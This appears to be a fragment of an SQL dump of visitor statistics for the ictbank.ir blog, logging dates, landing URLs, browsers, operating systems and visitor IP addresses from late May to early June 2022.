(21276,'2022-05-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.152.187.235','000',0,1,0),
(21277,'2022-05-26','https://www.google.com/','Firefox','Linux','Unknown',NULL,NULL,'','181.50.85.51','000',0,1,0),
(21278,'2022-05-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','195.201.225.177','000',0,1,0),
(21279,'2022-05-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(21280,'2022-05-27','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','61.6.48.179','000',0,1,0),
(21281,'2022-05-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(21282,'2022-05-27','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','68.169.243.105','000',0,1,0),
(21283,'2022-05-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','210.14.103.133','000',0,1,0),
(21284,'2022-05-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21285,'2022-05-27','https://www.google.com.hk/','Chrome','Windows','10.0',NULL,NULL,'','46.249.98.54','000',0,1,0),
(21286,'2022-05-27','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.200.35.97','000',0,1,0),
(21287,'2022-05-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.185.70','000',0,2,0),
(21288,'2022-05-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(21289,'2022-05-27','http://wikisonnati.com/blog','Chrome','Windows','6.3',NULL,NULL,'','195.154.61.140','000',0,2,0),
(21290,'2022-05-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21291,'2022-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.31.249','000',0,1,0),
(21292,'2022-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','119.164.104.14','000',0,1,0),
(21293,'2022-05-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(21294,'2022-05-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(21295,'2022-05-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(21296,'2022-05-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21297,'2022-05-27','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','159.89.35.226','000',0,1,0),
(21298,'2022-05-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.245.186.32','000',0,1,0),
(21299,'2022-05-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','35.162.34.24','000',0,1,0),
(21300,'2022-05-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.61.188.150','000',0,2,0),
(21301,'2022-05-27','http://wikisonnati.com/blog','Firefox','OS X','10.13',NULL,NULL,'','135.181.150.91','000',0,2,0),
(21302,'2022-05-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(21303,'2022-05-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,1,0),
(21304,'2022-05-28','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','85.202.169.92','000',0,4,0),
(21305,'2022-05-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(21306,'2022-05-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.123.21','000',0,2,0),
(21307,'2022-05-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.97','000',0,2,0),
(21308,'2022-05-28','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.184','000',0,1,0),
(21309,'2022-05-28','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.206','000',0,1,0),
(21310,'2022-05-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.152','000',0,1,0),
(21311,'2022-05-28','http://ictbank.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','35.180.121.173','000',0,4,0),
(21312,'2022-05-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21313,'2022-05-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21314,'2022-05-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.177','000',0,2,0),
(21315,'2022-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.140','000',0,2,0),
(21316,'2022-05-28','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.53','000',0,2,0),
(21317,'2022-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.249.222','000',0,1,0),
(21318,'2022-05-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.197.28.60','000',0,2,0),
(21319,'2022-05-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.186','000',0,4,0),
(21320,'2022-05-28','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.226','000',0,1,0),
(21321,'2022-05-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.179','000',0,4,0),
(21322,'2022-05-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','136.243.64.164','000',0,2,0),
(21323,'2022-05-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21324,'2022-05-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,2,0),
(21325,'2022-05-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(21326,'2022-05-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(21327,'2022-05-28','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','5.115.206.85','000',0,2,0),
(21328,'2022-05-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','188.40.113.31','000',0,9,0),
(21329,'2022-05-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.209.40.223','000',0,2,0),
(21330,'2022-05-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','51.195.91.124','000',0,1,0),
(21331,'2022-05-29','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21332,'2022-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','125.84.239.174','000',0,1,0),
(21333,'2022-05-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.135.131','000',0,2,0),
(21334,'2022-05-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.121.80.103','000',0,1,0),
(21335,'2022-05-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(21336,'2022-05-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21337,'2022-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','189.254.1.218','000',0,3,0),
(21338,'2022-05-29','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.146.209.233','000',0,2,0),
(21339,'2022-05-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21340,'2022-05-29','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','1.83.125.226','000',0,1,0),
(21341,'2022-05-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.61.186.177','000',0,2,0),
(21342,'2022-05-29','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','54.37.132.86','000',0,1,0),
(21343,'2022-05-29','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','46.161.27.204','000',0,5,0),
(21344,'2022-05-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.53.243','000',0,1,0),
(21345,'2022-05-29','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','100.26.5.239','000',0,1,0),
(21346,'2022-05-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(21347,'2022-05-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21348,'2022-05-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(21349,'2022-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.94.252.23','000',0,1,0),
(21350,'2022-05-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','103.133.137.180','000',0,5,0),
(21352,'2022-05-30','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.64','000',0,8,0),
(21353,'2022-05-30','https://www.google.com/','Chrome','Windows','6.3',NULL,NULL,'','5.12.219.117','000',0,1,0),
(21354,'2022-05-30','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.51','000',0,1,0),
(21355,'2022-05-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21356,'2022-05-30','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(21357,'2022-05-30','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','6.1',NULL,NULL,'','178.159.37.11','000',0,8,0),
(21358,'2022-05-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,7,0),
(21359,'2022-05-30','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,2,0),
(21360,'2022-05-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21361,'2022-05-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.4.96','000',0,1,0),
(21362,'2022-05-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(21363,'2022-05-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(21364,'2022-05-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21365,'2022-05-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21366,'2022-05-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','111.162.143.134','000',0,1,0),
(21367,'2022-05-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.16','000',0,2,0),
(21368,'2022-05-31','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','45.185.42.120','000',0,1,0),
(21369,'2022-05-31','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.83','000',0,2,0),
(21370,'2022-05-31','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','54.37.132.86','000',0,2,0),
(21371,'2022-05-31','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','35.175.131.54','000',0,1,0),
(21372,'2022-05-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,8,0),
(21373,'2022-05-31','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.153.24','000',0,2,0),
(21374,'2022-05-31','http://ictbank.ir/blog/index.php/category/database/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.4','000',0,7,0),
(21375,'2022-05-31','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.66','000',0,5,0),
(21376,'2022-05-31','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','80.147.192.181','000',0,1,0),
(21377,'2022-05-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.73.82','000',0,1,0),
(21378,'2022-05-31','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','15.206.165.187','000',0,1,0),
(21379,'2022-05-31','http://ictbank.ir/blog/','Safari','iOS','15.3.1',NULL,NULL,'','109.201.130.10','000',0,1,0),
(21380,'2022-05-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','89.238.135.139','000',0,1,0),
(21381,'2022-05-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','87.115.231.138','000',0,1,0),
(21382,'2022-05-31','http://ictbank.ir/blog/','Chrome','Android','8.0',NULL,NULL,'','185.147.212.18','000',0,1,0),
(21383,'2022-05-31','http://ictbank.ir/blog','Chrome','Android','8.0',NULL,NULL,'','45.221.68.162','000',0,1,0),
(21384,'2022-05-31','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','84.247.50.180','000',0,2,0),
(21385,'2022-05-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(21386,'2022-05-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(21387,'2022-05-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(21388,'2022-05-31','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','222.172.130.234','000',0,1,0),
(21389,'2022-05-31','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','85.202.169.92','000',0,1,0),
(21390,'2022-05-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21391,'2022-05-31','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.76','000',0,1,0),
(21392,'2022-06-01','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','157.245.116.23','000',0,2,0),
(21393,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,2,0),
(21394,'2022-06-01','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','92.191.29.118','000',0,2,0),
(21395,'2022-06-01','http://ictbank.ir/','Chrome','OS X','10.12.5',NULL,NULL,'','192.210.223.100','000',0,1,0),
(21396,'2022-06-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','143.110.253.172','000',0,2,0),
(21397,'2022-06-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.210.0.208','000',0,2,0),
(21398,'2022-06-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,9,0),
(21399,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.100.69','000',0,1,0),
(21400,'2022-06-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','171.25.193.77','000',0,1,0),
(21401,'2022-06-01','http://ictbank.ir/blog','Safari','OS X','10.6.6',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21402,'2022-06-01','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','41.224.37.66','000',0,1,0),
(21403,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.123.121.17','000',0,2,0),
(21404,'2022-06-01','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','50.106.27.23','000',0,3,0),
(21405,'2022-06-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21406,'2022-06-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','183.89.75.201','000',0,1,0),
(21407,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.116.82','000',0,1,0),
(21408,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.22.213.197','000',0,2,0),
(21409,'2022-06-01','http://ictbank.ir/blog/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.6','000',0,8,0),
(21410,'2022-06-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(21411,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','111.224.221.109','000',0,1,0),
(21412,'2022-06-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(21413,'2022-06-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21414,'2022-06-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(21415,'2022-06-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.70.184.123','000',0,1,0),
(21416,'2022-06-01','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','124.227.31.143','000',0,1,0),
(21417,'2022-06-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.41','000',0,2,0),
(21418,'2022-06-01','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,2,0),
(21419,'2022-06-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,9,0),
(21420,'2022-06-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,4,0),
(21421,'2022-06-02','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.128.26.216','000',0,2,0),
(21422,'2022-06-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21423,'2022-06-02','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.82','000',0,4,0),
(21424,'2022-06-02','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(21425,'2022-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.182.251.232','000',0,2,0),
(21426,'2022-06-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(21427,'2022-06-02','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.67.19','000',0,1,0),
(21428,'2022-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.89.253.169','000',0,1,0),
(21429,'2022-06-02','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','89.38.97.116','000',0,2,0),
(21430,'2022-06-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.121','000',0,3,0),
(21431,'2022-06-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','171.37.64.56','000',0,1,0),
(21432,'2022-06-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(21433,'2022-06-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(21434,'2022-06-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(21435,'2022-06-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21436,'2022-06-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(21437,'2022-06-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.54.120.220','000',0,1,0),
(21438,'2022-06-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,13,0),
(21439,'2022-06-03','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(21440,'2022-06-03','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,4,0),
(21441,'2022-06-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,4,0),
(21442,'2022-06-03','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','3.84.195.173','000',0,1,0),
(21443,'2022-06-03','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','136.169.243.111','000',0,6,0),
(21444,'2022-06-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','103.133.137.183','000',0,2,0),
(21445,'2022-06-03','http://wikisonnati.com/blog/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.82','000',0,2,0),
(21446,'2022-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,1,0),
(21447,'2022-06-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.193.114','000',0,2,0),
(21448,'2022-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.250.30.131','000',0,4,0),
(21449,'2022-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.52.83','000',0,1,0),
(21450,'2022-06-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','27.227.186.219','000',0,1,0),
(21451,'2022-06-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.83','000',0,1,0),
(21452,'2022-06-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','125.26.8.129','000',0,11,0),
(21453,'2022-06-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(21454,'2022-06-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21455,'2022-06-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','58.19.46.29','000',0,1,0),
(21456,'2022-06-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21457,'2022-06-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(21458,'2022-06-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(21459,'2022-06-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21460,'2022-06-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.189.57','000',0,2,0),
(21461,'2022-06-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','111.224.234.74','000',0,1,0),
(21462,'2022-06-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,14,0),
(21463,'2022-06-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(21464,'2022-06-04','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','118.193.45.5','000',0,1,0),
(21465,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','103.14.35.145','000',0,1,0),
(21466,'2022-06-04','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.91.96.133','000',0,1,0),
(21467,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,2,0),
(21468,'2022-06-04','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.189.26','000',0,1,0),
(21469,'2022-06-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(21470,'2022-06-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.142.79.1','000',0,6,0),
(21471,'2022-06-04','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.81','000',0,8,0),
(21472,'2022-06-04','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.82','000',0,2,0),
(21473,'2022-06-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.57.178','000',0,1,0),
(21474,'2022-06-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','20.27.59.98','000',0,2,0),
(21475,'2022-06-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21476,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.108.171','000',0,1,0),
(21477,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','150.249.214.252','000',0,1,0),
(21478,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','39.111.208.132','000',0,1,0),
(21479,'2022-06-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21480,'2022-06-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.115.86','000',0,1,0),
(21481,'2022-06-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(21482,'2022-06-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(21483,'2022-06-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21484,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','119.60.104.255','000',0,1,0),
(21485,'2022-06-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.83','000',0,1,0),
(21486,'2022-06-04','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','180.163.220.5','000',0,1,0),
(21487,'2022-06-04','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.109','000',0,1,0),
(21488,'2022-06-04','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.45','000',0,1,0),
(21489,'2022-06-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(21490,'2022-06-04','https://www.bing.com','Chrome','OpenBSD','',NULL,NULL,'','138.197.223.80','000',0,1,0),
(21491,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,2,0),
(21492,'2022-06-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21493,'2022-06-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,11,0),
(21494,'2022-06-05','http://ictbank.ir/blog','Chromium','Ubuntu','11.04',NULL,NULL,'','208.80.194.122','000',0,2,0),
(21495,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.171.149.126','000',0,2,0),
(21496,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.239.58.107','000',0,1,0),
(21497,'2022-06-05','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','198.12.107.235','000',0,3,0),
(21498,'2022-06-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.146','000',0,2,0),
(21499,'2022-06-05','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','181.214.173.227','000',0,1,0),
(21500,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.245.110.87','000',0,2,0),
(21501,'2022-06-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','2.57.121.130','000',0,1,0),
(21502,'2022-06-05','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.118','000',0,1,0),
(21503,'2022-06-05','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,2,0),
